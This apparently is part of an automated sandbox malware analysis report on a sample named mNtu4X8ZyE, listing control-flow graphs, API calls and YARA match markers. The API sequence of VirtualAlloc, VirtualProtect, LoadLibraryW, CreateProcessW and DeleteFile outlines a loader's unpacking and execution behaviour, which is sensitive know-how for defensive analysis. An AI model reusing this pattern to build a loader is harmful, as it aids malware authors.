                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 004013F0
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 00401402
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 00401405
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,6EA4A3D8,004059A4), ref: 0040141A
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 0040142B
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 0040142E
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 00401440
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 00401443
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 00401455
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 00401458
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 0040146C
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 0040146F
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 00401481
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 00401484
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1305693753.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1305662841.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305718639.0000000000405000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305744729.0000000000407000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1305744729.0000000000474000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_mNtu4X8ZyE.jbxd
                                                                                      Similarity
                                                                                      • API ID: U?$char_traits@V?$basic_ostream@$?endl@std@@D@std@@@1@V21@@$??6std@@D@std@@@0@V10@
                                                                                      • String ID:
                                                                                      • API String ID: 2803004057-0
                                                                                      • Opcode ID: 4e668faee3baf0bf314fe0a6ed89ed04cc46d060bfd11fc77c33a5f615d1b13b
                                                                                      • Instruction ID: e5c193a8be6e18b913c016f231c9b957fb8706e5e71893854bd9b99652add971
                                                                                      • Opcode Fuzzy Hash: 4e668faee3baf0bf314fe0a6ed89ed04cc46d060bfd11fc77c33a5f615d1b13b
                                                                                      • Instruction Fuzzy Hash: 0E51F3796053919FC700EB74DD8882B7FA9EF88314F0548EDF845A73D1C6799418CBAA

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 464 26731f0-2673206 465 267320a-267320f 464->465 466 2673210-2673215 465->466 467 267333d-2673342 466->467 468 267321b 466->468 469 2673344-2673349 467->469 470 267337d-2673384 467->470 471 2673294-2673338 468->471 472 267321d-2673222 468->472 473 267334b-2673350 469->473 474 2673369-267336d 469->474 475 2673386-267339c call 2674190 call 26740f0 470->475 476 26733a1-26733ac 470->476 471->465 477 2673224-2673229 472->477 478 267325a-2673262 472->478 481 2673236-267323b 473->481 482 2673356-2673364 473->482 483 2673373-2673378 474->483 484 267342b-2673435 474->484 475->476 500 26733ae-26733c4 call 2674190 call 26740f0 476->500 501 26733c9-26733d7 RtlAllocateHeap 476->501 479 267322b-2673230 477->479 480 267324a-2673258 call 2673ee0 477->480 485 2673264-267327c call 2674190 call 26740f0 478->485 486 2673282-267328f 478->486 479->481 488 26733e3-26733eb 479->488 480->465 481->466 489 267323d-2673247 481->489 482->466 483->466 485->486 486->465 495 26733ed-2673405 call 2674190 call 26740f0 488->495 496 267340b-2673429 488->496 495->496 496->484 500->501 501->484 503 26733d9-26733de 501->503 503->465
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,0000021C), ref: 026733D1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID: V<j[$p^sw$12
                                                                                      • API String ID: 1279760036-1938916030
                                                                                      • Opcode ID: 772cd557450a5bf6a146d8f59586f20145016c6bf4ad6f9c0cbe736c9d60911c
                                                                                      • Instruction ID: c1220ef7468c8cca04f80277ec6d32a5e5a81863d18748dfe74c9a87bd276105
                                                                                      • Opcode Fuzzy Hash: 772cd557450a5bf6a146d8f59586f20145016c6bf4ad6f9c0cbe736c9d60911c
                                                                                      • Instruction Fuzzy Hash: 6051D571A44341CBC758DE28B4C452EBBE2EBD4254F104D6EE452CB391DB71C96ACBD2

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 598 221002d-221009e call 2210456 * 6 611 22100a0-22100a2 598->611 612 22100a7-22100b0 598->612 613 221044e-2210455 611->613 612->611 614 22100b2-22100b6 612->614 614->611 615 22100b8-22100c2 614->615 616 22100e4-2210105 GetNativeSystemInfo 615->616 617 22100c4-22100c7 615->617 616->611 619 2210107-221012d VirtualAlloc 616->619 618 22100c9-22100cf 617->618 620 22100d1-22100d4 618->620 621 22100d6 618->621 622 2210162-221016c 619->622 623 221012f-2210133 619->623 626 22100d9-22100e2 620->626 621->626 624 22101a4-22101b5 622->624 625 221016e-2210173 622->625 627 2210135-2210138 623->627 631 2210234-2210240 624->631 632 22101b7-22101d1 624->632 630 2210177-221018a 625->630 626->616 626->618 628 2210153-2210155 627->628 629 221013a-2210142 627->629 634 2210157-221015c 628->634 629->628 633 2210144-2210147 629->633 635 2210199-221019e 630->635 636 221018c-2210193 630->636 637 22102f0-22102fa 631->637 638 2210246-221025d 631->638 648 22101d3 632->648 649 2210222-221022e 632->649 640 2210149-221014c 633->640 641 221014e-2210151 633->641 634->627 642 221015e 634->642 635->630 646 22101a0 635->646 636->636 643 2210195 636->643 644 2210300-2210307 637->644 645 22103b2-22103c7 call 26127b0 637->645 638->637 647 2210263-2210273 638->647 640->628 640->641 641->634 642->622 643->635 650 2210309-2210312 644->650 673 22103c9-22103ce 645->673 646->624 651 22102d5-22102e6 647->651 652 2210275-2210279 647->652 654 22101d7-22101db 648->654 649->632 657 2210230 649->657 658 22103a7-22103ac 650->658 659 2210318-2210333 650->659 651->647 656 22102ec 651->656 653 221027a-2210289 652->653 660 2210291-221029a 653->660 661 221028b-221028f 653->661 662 22101fb-2210204 654->662 663 22101dd 654->663 656->637 657->631 658->645 658->650 664 2210335-2210337 659->664 665 221034d-221034f 659->665 669 22102c3-22102c7 660->669 661->660 668 221029c-22102a1 661->668 679 2210207-221021c 662->679 663->662 672 22101df-22101f9 663->672 666 2210340-2210343 664->666 667 2210339-221033e 664->667 670 2210351-2210353 665->670 671 2210368-221036a 665->671 674 2210345-221034b 666->674 667->674 675 22102a3-22102b2 668->675 676 22102b4-22102b7 668->676 669->653 682 22102c9-22102d1 669->682 677 2210355-2210357 670->677 678 2210359-221035b 670->678 683 2210371-2210376 671->683 684 221036c 671->684 672->679 680 22103d0-22103d4 673->680 681 221044c 673->681 685 2210379-2210380 674->685 675->669 676->669 686 22102b9-22102bf 676->686 687 221036e-221036f 677->687 678->671 688 221035d-221035f 678->688 679->654 690 221021e 679->690 680->681 689 22103d6-22103e0 680->689 681->613 682->651 683->685 684->687 693 2210382 685->693 694 2210388-221039d VirtualProtect 685->694 686->669 687->685 688->685 691 2210361-2210366 688->691 689->681 692 22103e2-22103e6 689->692 690->649 691->685 692->681 696 22103e8-22103f9 692->696 693->694 694->611 695 22103a3 694->695 695->658 696->681 697 22103fb-2210400 696->697 698 2210402-221040f 697->698 698->698 699 2210411-2210415 698->699 700 2210417-2210429 699->700 701 221042d-2210433 699->701 700->697 703 221042b 700->703 701->681 702 2210435-221044b 701->702 702->681 703->681
                                                                                      APIs
                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,02210005), ref: 022100E9
                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,02210005), ref: 02210111
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2210000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocInfoNativeSystemVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2032221330-0
                                                                                      • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                                      • Instruction ID: e87a7abaa2fe85d5e1be2351f9f08c843da0220c70ad4e683244fe613137fbcc
                                                                                      • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                                      • Instruction Fuzzy Hash: A3D1C371A183068FD714CFA9C880B6AB3E1FFA4318F18452DEC95DB245E774EA85CB91

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 706 26773c0-26773c7 707 26773d0-26773d5 706->707 708 26774e1-26774e6 707->708 709 26773db 707->709 712 267752a-267752f 708->712 713 26774e8 708->713 710 26773dd-26773e2 709->710 711 2677449-267745c call 26735f0 709->711 715 2677437-267743c 710->715 716 26773e4 710->716 731 267745e-2677474 call 2674190 call 26740f0 711->731 732 2677479-267748c LoadLibraryW 711->732 717 2677531-2677545 call 2677320 712->717 718 267754a-267754f 712->718 719 26774ea-26774ef 713->719 720 2677558-2677563 713->720 715->718 721 2677442-2677447 715->721 723 26773e6-26773eb 716->723 724 2677421-2677435 call 2677320 716->724 717->707 718->707 726 2677555-2677557 718->726 727 2677511-2677525 call 2677320 719->727 728 26774f1-26774f6 719->728 721->707 733 26773ed-26773f2 723->733 734 267740b-267741f call 2677320 723->734 724->707 727->707 728->718 729 26774f8-267750c call 2677320 728->729 729->707 731->732 742 267748e-26774a4 call 2674190 call 26740f0 732->742 743 26774a9-26774b4 732->743 733->718 741 26773f8-2677409 call 2677320 733->741 734->707 741->707 742->743 754 26774b6-26774cc call 2674190 call 26740f0 743->754 755 26774d1-26774dc 743->755 754->755 755->707
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,38CFF007,02676F11), ref: 0267747A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: 12
                                                                                      • API String ID: 1029625771-2589614596
                                                                                      • Opcode ID: 9b5306a557b6ff722e58e3305c1fd8275ba8ec70b608dd463ab39202973081e2
                                                                                      • Instruction ID: 23ed74314e81c3ff7cd7ef6b46c8604adf81466af7b7c94d128999c1ad3fc4ce
                                                                                      • Opcode Fuzzy Hash: 9b5306a557b6ff722e58e3305c1fd8275ba8ec70b608dd463ab39202973081e2
                                                                                      • Instruction Fuzzy Hash: C031A460BC414487DA2EA679785073FF6939F80620F605C6EE903DF344EF65C856CB9A

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 02674F41
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID: D
                                                                                      • API String ID: 963392458-2746444292
                                                                                      • Opcode ID: 1892094786eeb1609e3a906f64971e257964cc9fa0fd6ba7bba085b5940316e8
                                                                                      • Instruction ID: 8abd368459fb0f1a84848df4a094ca183dadeb053cae6301b933bab5ba5f1ec7
                                                                                      • Opcode Fuzzy Hash: 1892094786eeb1609e3a906f64971e257964cc9fa0fd6ba7bba085b5940316e8
                                                                                      • Instruction Fuzzy Hash: 5C219431B442815FE714AB78BC58B6F3BE6AFC0600F10482CB944CE380EF75D8698B95

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID: 12
                                                                                      • API String ID: 4033686569-2589614596
                                                                                      • Opcode ID: a249c7efcb405400371085864d005283e661b18986d82bb55ced5abc19703d80
                                                                                      • Instruction ID: b2e76401069eef20218b642b4f3d102f90670971a70c17b00ceb62be34384288
                                                                                      • Opcode Fuzzy Hash: a249c7efcb405400371085864d005283e661b18986d82bb55ced5abc19703d80
                                                                                      • Instruction Fuzzy Hash: C2118270B842408BD718BB79B918B3F3AE6AFC5600B000C6CA815CB381EF75C8298F95

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,38CFF007,02677540,?,38CFF007,02676F11), ref: 02677350
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: 12
                                                                                      • API String ID: 1029625771-2589614596
                                                                                      • Opcode ID: 1b913bcba12e29a5bc36a44e222a14cf8d2f59dc9876a587c9d7b01f83aeb45b
                                                                                      • Instruction ID: 8a276c1f36aa2c9ea8c2dbf2e932c8e83d0395b4ebf20545eaecaacf63997f28
                                                                                      • Opcode Fuzzy Hash: 1b913bcba12e29a5bc36a44e222a14cf8d2f59dc9876a587c9d7b01f83aeb45b
                                                                                      • Instruction Fuzzy Hash: AD014B74B842818BC718BB79B854B3E7BE6AFC16107015C7CA805DB341EF36C8658FA9

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 849 2676060-267606c call 2676860 852 267606e-2676084 call 2674190 call 26740f0 849->852 853 2676089-267608d ExitProcess 849->853 852->853
                                                                                      APIs
                                                                                      • ExitProcess.KERNEL32(00000000), ref: 0267608B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: 9d21193ce0bcc67affaa945b3f94f2e2939d3d0434139fb3833c5119f3a7c9c7
                                                                                      • Instruction ID: e578e06a531ba8801642ba16acd7d5998865873ab9f2137b8ac20a746b25161c
                                                                                      • Opcode Fuzzy Hash: 9d21193ce0bcc67affaa945b3f94f2e2939d3d0434139fb3833c5119f3a7c9c7
                                                                                      • Instruction Fuzzy Hash: 1DD01230F805858AD704BBB6B914B3E36D6AF80705F405C2DF5419F285EF6588209F99
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306220984.0000000002611000.00000020.00001000.00020000.00000000.sdmp, Offset: 02611000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2611000_mNtu4X8ZyE.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 98dc5cabca71d4b830df0347d0be53831c3de5a973e2040009da3dfd232530b7
                                                                                      • Instruction ID: 4945b6df2568082fe3752fb74d8cbf864f31211057846cdf99fd7edd962778ea
                                                                                      • Opcode Fuzzy Hash: 98dc5cabca71d4b830df0347d0be53831c3de5a973e2040009da3dfd232530b7
                                                                                      • Instruction Fuzzy Hash: 2541C974A04109EFDB04CF94C494BAAB7B2FB89314F18C199E9199F395C775FA82CB80
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,000001C3,00000000,?,38CFF007,?,?), ref: 026784C7
                                                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0267853C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CreateHandleInformation
                                                                                      • String ID:
                                                                                      • API String ID: 3667790775-0
                                                                                      • Opcode ID: d345bc4843815ed3c1c56d9e907ec27d96b58312be75b727fa9e41e0fec97057
                                                                                      • Instruction ID: 9e6119aa5c9d82c66e7031438dc8b88338b71b08daffe0d1b821b6d537e0e3e8
                                                                                      • Opcode Fuzzy Hash: d345bc4843815ed3c1c56d9e907ec27d96b58312be75b727fa9e41e0fec97057
                                                                                      • Instruction Fuzzy Hash: 45F0CD716082005BDB2CDA58B8ACB3E73D66F88214F74191DF25ADBBD0D7209C415B56
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306220984.0000000002611000.00000020.00001000.00020000.00000000.sdmp, Offset: 02611000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2611000_mNtu4X8ZyE.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: 588f89f5ebd5181a5eed084dcd3e2464204bcc7241d3800004d29eb1a96d1463
                                                                                      • Instruction ID: f77f59383c36437a73922e973799da6722e236e2f7e5e2e7a68c2a061420b2d0
                                                                                      • Opcode Fuzzy Hash: 588f89f5ebd5181a5eed084dcd3e2464204bcc7241d3800004d29eb1a96d1463
                                                                                      • Instruction Fuzzy Hash: CBD05EB4D40248BFD700EFA4D90AA5DBBB4EB04303F4480A9E905A7340EAB03B148F92
                                                                                      APIs
                                                                                      • VirtualFree.KERNELBASE(?,?,?), ref: 0261182F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306220984.0000000002611000.00000020.00001000.00020000.00000000.sdmp, Offset: 02611000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2611000_mNtu4X8ZyE.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1263568516-0
                                                                                      • Opcode ID: b4a0a193c4fcaca9e1b0e65e2325144eb30d800d37d892fa9355c7b67289b0aa
                                                                                      • Instruction ID: fc96a1682a335761fe1a9d8d986d52a2edc78797013af01cbc22e33a6bfd1868
                                                                                      • Opcode Fuzzy Hash: b4a0a193c4fcaca9e1b0e65e2325144eb30d800d37d892fa9355c7b67289b0aa
                                                                                      • Instruction Fuzzy Hash: EEC04C7A55424CAB8B04DF98E884DAB37EDBB8C651B048549BA1DC7200C630F9608BA4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3-z$7I$9Cl$PM$}=1!$12
                                                                                      • API String ID: 0-3047339970
                                                                                      • Opcode ID: 59076b1cdb3333194e7e187ae4a6fad1e6ec466821db8f34fba3fee4f5303cba
                                                                                      • Instruction ID: 92be666800073729614ae65184cc6b94187097df9508d4817891a3882636dc02
                                                                                      • Opcode Fuzzy Hash: 59076b1cdb3333194e7e187ae4a6fad1e6ec466821db8f34fba3fee4f5303cba
                                                                                      • Instruction Fuzzy Hash: 4491AF71A083428FD719EF68F985A2FB7E5BB84308F004D2CE49597350EB71DA598F92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2210000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3-z$7I$9Cl$PM$}=1!$12
                                                                                      • API String ID: 0-3047339970
                                                                                      • Opcode ID: fe3376d88962dbdf62e14e2e1c357dfbfa7d47802002f184e1e155cb176f56b9
                                                                                      • Instruction ID: 15aefe067abe4bebfd7a76909ed326edbec4f7b61e71c995004a76e6702eff5f
                                                                                      • Opcode Fuzzy Hash: fe3376d88962dbdf62e14e2e1c357dfbfa7d47802002f184e1e155cb176f56b9
                                                                                      • Instruction Fuzzy Hash: 0191E271A183028FC724EFA8D954A2BB7E5FFD4308F40492CE095A7268D774DA19CF92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2210000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$iL`2$iL`2$12$V^!
                                                                                      • API String ID: 0-1221398831
                                                                                      • Opcode ID: e02f4294084b2259ba109e77238ed80de81e8d9e351bf6523ceeb443ab4b0007
                                                                                      • Instruction ID: 7d4472492830e7ddff4e1667c02ac784f48c43f81ab77b8f2adfe36dfb0d7227
                                                                                      • Opcode Fuzzy Hash: e02f4294084b2259ba109e77238ed80de81e8d9e351bf6523ceeb443ab4b0007
                                                                                      • Instruction Fuzzy Hash: 5D919C716183019FD318DFA49994A2FBBE5AFD4304F50892DF48ADB2A8D774D908CF92
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, Offset: 02670000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1306312324.0000000002670000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306344646.000000000267D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.0000000002680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1306358696.00000000026C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2670000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick
                                                                                      • String ID: 5~$PK
                                                                                      • API String ID: 536389180-1089616948
                                                                                      • Opcode ID: ced2e47cef0e84d7cd2f2b47c55416f9ddb6e5fe9958de4e6b57e97c395fc8e5
                                                                                      • Instruction ID: 519b28fc3a0b81e8050e070461da30273fcd737a0f92d5b82ada9f0be0a51061
                                                                                      • Opcode Fuzzy Hash: ced2e47cef0e84d7cd2f2b47c55416f9ddb6e5fe9958de4e6b57e97c395fc8e5
                                                                                      • Instruction Fuzzy Hash: 6932D371A087028BD718DE78F88412EB7E6AB90748F14492DE496DB360DB74D949CFE3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2210000_mNtu4X8ZyE.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: [i$V^!$x*
                                                                                      • API String ID: 0-1411442858
